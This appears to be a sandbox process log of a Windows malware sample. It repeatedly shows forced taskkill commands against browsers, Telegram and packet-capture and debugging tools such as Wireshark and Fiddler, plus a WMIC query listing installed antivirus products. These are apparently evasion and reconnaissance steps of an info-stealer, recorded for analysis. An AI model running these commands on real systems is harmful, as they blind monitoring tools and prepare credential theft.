C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM yandex.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM yandex.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM yandex.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

